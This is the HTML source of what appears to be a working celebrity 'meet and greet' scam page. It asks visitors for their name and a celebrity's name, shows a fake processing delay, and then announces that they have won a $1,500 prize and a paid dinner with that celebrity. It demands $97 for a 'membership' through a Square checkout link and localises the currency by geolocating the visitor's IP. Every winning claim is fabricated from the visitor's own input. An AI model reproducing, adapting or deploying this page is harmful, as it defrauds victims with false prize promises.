<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<meta charset=utf-8>   

  <title>Meet and Greet</title>
  <style>
    #mainContent {
      display: none;
    }
    
    #processing {
      display: none;
      text-align: center;
    }
    
    .lds-ring {
      display: inline-block;
      position: relative;
      width: 60px;
      height: 60px;
    }
    
    .lds-ring div {
      box-sizing: border-box;
      display: block;
      position: absolute;
      width: 125px;
      height: 125px;
      margin: 8px;
      border: 7px solid DarkRed;
      border-radius: 50%;
      animation: lds-ring 1.2s cubic-bezier(0.5, 0, 0.5, 1) infinite;
      border-color: Black transparent transparent transparent;
    }
    
    .lds-ring div:nth-child(1) {
      animation-delay: -0.45s;
    }
    
    .lds-ring div:nth-child(2) {
      animation-delay: -0.3s;
    }
    
    .lds-ring div:nth-child(3) {
      animation-delay: -0.15s;
    }
    
    @keyframes lds-ring {
      0% {
        transform: rotate(0deg);
      }
      100% {
        transform: rotate(360deg);
      }
    }
  </style>
  
  
  
  
  <script>
    function submitForm() {
      // Hide the form
      document.getElementById("myForm").style.display = "none";
      
      // Display the "Processing" message and animation
      document.getElementById("processing").style.display = "block";
      
      // Delay displaying the main content
      setTimeout(function() {
        // Hide the processing message and animation
        document.getElementById("processing").style.display = "none";
        
        // Display the main content
        document.getElementById("mainContent").style.display = "block";
        
        // Get the form data
        const name = document.getElementById("name").value;
        const email = document.getElementById("email").value;
        
        // Display the submitted form data in multiple places within the main content
        const submittedNameElements = document.getElementsByClassName("submittedName");
        const submittedEmailElements = document.getElementsByClassName("submittedEmail");
        
        for (let i = 0; i < submittedNameElements.length; i++) {
          submittedNameElements[i].textContent = name;
        }
        
        for (let i = 0; i < submittedEmailElements.length; i++) {
          submittedEmailElements[i].textContent = email;
        }
        
        // Scroll to the main content section
        document.getElementById("mainContent").scrollIntoView({ behavior: 'smooth' });
      }, 2000); // 7 seconds delay
    }
  </script>
  
  
</head>
<body>



  
  
  
  
  <form id="myForm" onsubmit="submitForm(); return false;">
  
 
  <div> 
  <div class="formbold-form-wrapper">


  <form id="myForm" onsubmit="submitForm(); return false;">

 
<h5>
<strong> 
<img style="-webkit-user-select: none;max-width: 100%;margin: auto;" src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSCVhV5dQAF_uFaev94cd2k2baOvfogBiADLZgnCVaZi2YF-ccI3fCZbK4&amp;amp;s=10">
<br>

To access your  meet and greet profile, kindly enter your name and the name of the celebrity you'd like to meet below.

</strong> <br>
</h5>  






<div id="error-message"></div>

<script>
function validateInput(input) {
  var minLength = 4;
  var maxLength = 30;
  var errorMessage = document.getElementById("error-message");

  if (input.value.length < minLength || input.value.length > maxLength) {
    errorMessage.textContent = "Enter name";
    input.setCustomValidity("Complete This");
  } else {
    errorMessage.textContent = "";
    input.setCustomValidity("");
  }
}
</script>




<div class="formbold-mb-5">
        <label for="Field1" class="formbold-form-label">   
       <strong> Enter your first and last name</strong>
        </label>
  
        <input
          type="text" 
          
          oninput="validateInput(this)"
          
          required 
          name="A_"
         
         id="name"
         
          placeholder="Enter Your First and Last Name"  
          class="formbold-form-input"
        />
      </div>
      


<br>



     <label for="Field1" class="formbold-form-label">  
<strong>
Enter name of celebrity you'd like to meet
</strong>
</label>


    <input type="text" id="email" name="A_"

oninput="validateInput(this)"

    placeholder="Enter Name Of Celebrity"  
          class="formbold-form-input" required
        />
      </div>


<br>

      <div>
        <button type="submit" value="Submit"
       class="formbold-btn w-full">CONTINUE</button>
      </div>
      
      
          <br> <br> <br> 


<br><br>


    </form>
  </div>
</div>


  

<style>
  @import url('https://fonts.googleapis.com/css2?family=Inter:wght@400;500;600;700&display=swap');
  * {
    margin: 0;
    padding: 0;
    box-sizing: border-box;
  }
  body {
    font-family: "Inter", sans-serif;
  }
  .formbold-mb-7 {
    margin-bottom: 25px;
  }
  .formbold-pt-8 {
    padding-top: 12px;
  }
  .formbold-main-wrapper {
    display: flex;
    align-items: center;
    justify-content: center;
    padding: 48px;
  }

  .formbold-form-wrapper {
    margin: 0 auto;
    max-width: 550px;
    width: 100%;
    background: white;
  }
  .formbold-form-label {
    display: block;
    font-weight: 500;
    font-size: 17px;
    color: Black;
    margin-bottom: 5px;
  }
  .formbold-form-label-9 {
    font-weight: 500;
    font-size: 18px;
    margin-bottom: 25px;
  }

  .formbold-form-input {
    width: 100%;
    padding: 17px 24px;
    border-radius: 6px;
    border: 2px solid Black;
    background: white;
    font-weight: 500;
    font-size: 18px;
    color: Black;
    outline: none;
    resize: none;
  }
  .formbold-form-input:focus {
    border-color: Grey;
    box-shadow: 0px 3px 8px rgba(0, 0, 0, 0.05);
  }

  .formbold-btn {
    text-align: center;
    font-size: 20px;
    border-radius: 51px;
    padding: 16px 32px;
    border: none;
    font-weight: 500;
    background-color: DarkBlue;
    color: white;
    cursor: pointer;
  }
  .formbold-btn:hover {
    box-shadow: 0px 3px 8px rgba(0, 0, 0, 0.05);
  }

  .formbold--mx-3 {
    margin-left: -12px;
    margin-right: -12px;
  }
  .formbold-px-3 {
    padding-left: 12px;
    padding-right: 12px;
  }
  .flex {
    display: flex;
  }
  .flex-wrap {
    flex-wrap: wrap;
  }
  .w-full {
    width: 100%;
  }

  .formbold-file-input input {
    opacity: 0;
    position: absolute;
    width: 100%;
    height: 100%;
  }

  .formbold-file-input label {
    position: relative;
    border: 1px dashed #e0e0e0;
    border-radius: 6px;
    min-height: 200px;
    display: flex;
    align-items: center;
    justify-content: center;
    padding: 48px;
    text-align: center;
  }
  .formbold-drop-file {
    display: block;
    font-weight: 600;
    color: #07074d;
    font-size: 20px;
    margin-bottom: 8px;
  }

  .formbold-or {
    font-weight: 500;
    font-size: 16px;
    color: #6b7280;
    display: block;
    margin-bottom: 8px;
  }
  .formbold-browse {
    font-weight: 500;
    font-size: 16px;
    color: #07074d;
    display: inline-block;
    padding: 8px 28px;
    border: 1px solid #e0e0e0;
    border-radius: 4px;
  }

  .formbold-file-list {
    border-radius: 6px;
    background: #f5f7fb;
    padding: 16px 32px;
  }

  .formbold-file-item {
    display: flex;
    align-items: center;
    justify-content: space-between;
  }

  .formbold-file-item button {
    color: DarkRed;
    border: none;
    background: transparent;
    cursor: pointer;
  }

  .formbold-file-name {
    font-weight: 500;
    font-size: 16px;
    color: #07074d;
    padding-right: 12px;
  }
  .formbold-progress-bar {
    margin-top: 20px;
    position: relative;
    width: 100%;
    height: 6px;
    border-radius: 8px;
    background: #e2e5ef;
  }

  .formbold-progress {
    position: absolute;
    width: 75%;
    height: 100%;
    left: 0;
    top: 0;
    background: #6a64f1;
    border-radius: 8px;
  }

  @media (min-width: 540px) {
    .sm\:w-half {
      width: 50%;
    }
  }
</style> 
  





  <div id="processing">




    <h5> 

<script>
  async function convertCurrency() {
    try {
      const response = await fetch('https://ipapi.co/json/');
      const data = await response.json();
      const country = data.country_code;

      const currencySymbolElements = document.getElementsByClassName('currency-symbol');

      if (country === 'GB') {
        Array.from(currencySymbolElements).forEach(element => {
          element.textContent = '£';
        });
      } else if (country === 'DE' || country === 'FR' || country === 'ES' || country === 'NL') {
        Array.from(currencySymbolElements).forEach(element => {
          element.textContent = '€';
        });
      }
    } catch (error) {
      console.error('Error:', error);
    }
  }
  
  document.addEventListener('DOMContentLoaded', convertCurrency);
</script>



<strong> 
<br> <br><br> <br><br>
<font size="+3">
Processing....
</font>


   </strong> 
</h5> 
    
    


    <div class="lds-ring">
      <div></div>
      <div></div>
      <div></div>
      <div></div>
    </div>
  </div>
  



  <div id="mainContent">





   
<html class=light lang=en><head><script src="https://www.googleoptimize.com/optimize.js?id=OPT-N3D6ZNP"></script><script>if(document.cookie.match("uc_performance_v1_0=accepted")?.length){
            window.dataLayer.push({'event': 'optimize.activate'});
        }</script>


<meta charset=utf-8>


<title>

Tom Jones

</title>



<meta content="width=device-width, initial-scale=1.0" name=viewport>


<link href=https://www.bitpanda.com/en rel=canonical><link href=/en hreflang=x-default rel=alternate><link href=/en hreflang=en rel=alternate><link href=/de hreflang=de rel=alternate><link href=/fr hreflang=fr rel=alternate><link href=/es hreflang=es rel=alternate><link href=/it hreflang=it rel=alternate><link href=/pl hreflang=pl rel=alternate>

<link href="https://cdn.bitpanda.com/app/v2/css/all.min.css?id=622e023bba9164dff838" rel=stylesheet><script src="https://cdn.bitpanda.com/app/v2/js/head.min.js?id=e37b5634f1d9be3b8e80"></script>


<script type=application/ld+json>{
                "@context": "https://schema.org",
                "@type": "BreadcrumbList",
                "itemListElement": [
                    [{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.bitpanda.com\/en"}]
                ]
            }</script> <body class="default home light" style="position: unset;"><header id=layout-header><header><div class="bp-nav js-contains-anchor"><div class=bp-nav__container><div class=util-flex-shrink-0>











<h5>
<strong> 

<span class="submittedEmail"></span>

</strong></h5>



 </div>
 
</header> 
    
    
    
    
  

 <section id=layout-content tabindex=-1><section class="default uk-padding-remove-bottom uk-section"><div class=uk-container><div class="uk-child-width-1-2@m uk-flex-middle uk-grid" uk-grid=""><div class=default><section class="module-text uk-padding-remove-bottom uk-padding-remove-top uk-section uk-text-left uk-text-left@m"><div class=module-text__content>












<h6> 


<div style="border: 1px solid black; padding: 10px; border-radius: 2px;">
<strong> 
<font size="+1">

 <span class="submittedName"></span>
 
 </font> 
 </strong> 
 <br> 
 
 <br> 

<div> 
<div class="container">
    <div class="left-text"><strong> 
    
<font size="+1">
<strong> 
Approved

</strong></font>

</div>
    <div class="right-text"><strong><font size="+0.5">Available Balance:</strong></strong> </font> 
    
    <br>
    
    <font size="+4">
 <span class="currency-symbol">$</span>1,500</font><strong><font size="+2"></font></strong>

</div>
</div>

<style>
    .container {
        display: flex;
        justify-content: space-between;
    }
    .left-text {
        justify-self: flex-start;
    }
    .right-text {
        justify-self: flex-end;
    }
</style>

</div> 

</div> 


</h6>





<h6> 
<strong> 






<font size="+0.5">
<Font STYLE="word-spacing:3px">





Welcome back, <span class="submittedName"></span> your all-expenses-paid dinner with <span class="submittedEmail"></span>  is scheduled for October 23, 2024. You will receive further notifications with specific venue and time details.


<br><br>
This is an avenue that the iconic <span class="submittedEmail"></span> uses to show love to  fans since 2016, and you, <span class="submittedName"></span> is one of the lucky winners of the 2024 meet and greet event, which includes a cash bonus prize of $1,500 and an all-expenses-paid dinner with <span class="submittedEmail"></span>.

  This event is free for members of the <span class="submittedEmail"></span> Exclusive community; however, you are not yet a member. Follow the procedure below to gain a 2-year membership. Please note that, since you are one of the winners of the 2024 meet and greet, the price of a 2-year membership has been reduced to just $97 instead of $500, courtesy of <span class="submittedEmail"></span>, to ensure you get your meet and greet session with <span class="submittedEmail"></span>  in October, follow the procedures below to buy a 2-year membership for just $95



<br> <br>


Proceed to checkout 
</font>



<font size="+1"><span class="currency-symbol">$</span>97</font>


<br> <br>



<a href="https://square.link/u/QxkNOsdm">

<button type="button" class="green-button" style="display: block; width: 100%; height: 57px; background-color: #2F539B; color: white; font-size: 22px; font-weight: bold; border: none; border-radius: 50px; cursor: pointer;">CONTINUE</button>

</a>


</font></font>
<br> <br>
<br>
<img style="-webkit-user-select: none;max-width: 100%;margin: auto;" src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRx9ff3vVlOMD-kv9S9SG7y2Y562UmGFjeYRw&amp;amp;usqp=CAU">



 


<br> <br> <br>

</strong>
</font></font> 

 </h6> 
 
 
 
 




<h6>



<div style="background-color: black; color: white; padding: 20px; text-align: center;">


<p style="text-align: left;"><strong>
<font size="+4">
*****
</font>
</strong> 
</p>


<font size="+0.5">
<Font STYLE="word-spacing:4px"><strong>
Congratulations  <span class="submittedName"></span> you are one of the lucky fans who have won in the highly anticipated <span class="submittedEmail"></span> meet and greet program  this year. We sincerely hope this opportunity brings you immense joy and fulfillment. <span class="submittedEmail"></span> stands out because of his genuine care for his fans, as demonstrated by his generous offering of an incredibly exclusive meet and greet   which includes an all expenses paid dinner plus  a cash prize all for free.
<br><br>
Prepare yourself for an unforgettable and extraordinary intimate journey with <span class="submittedEmail"></span>.
  Once again, we extend our warmest congratulations, and we hope you relish every moment of this well-deserved win.
   </font> </font></strong>
   
   <br><br>
   <p style="text-align: right;"><strong>
<font size="+4">
*****
</font>
</strong> 
</p>
   
   </div> 
  
   </h6> 













<h5>
   

<br> <br> <br> 

<center> <strong> 

<span class="submittedEmail"></span>

</center> 
<br> 
</strong>
</h5> 




</div>


 </section> 
 


</path> </symbol></svg>


  
  <script>
    // Hide the processing message and form initially
    document.getElementById("processing").style.display = "none";
    document.getElementById("myForm").style.display = "block";
  </script>
</body>
</html>

